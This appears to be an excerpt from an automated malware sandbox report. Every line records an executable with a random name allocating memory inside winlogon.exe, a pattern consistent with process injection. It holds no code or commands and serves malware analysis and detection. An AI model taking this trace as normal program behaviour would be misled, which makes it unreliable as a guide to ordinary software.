Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB58000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB78000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB98000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBB8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBD8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC18000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC38000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC58000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC78000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC98000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD18000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD38000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD58000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD78000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD98000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE18000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE38000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE58000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE78000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE98000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF18000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF38000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF58000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF78000 protect: page read and writeJump to behavior
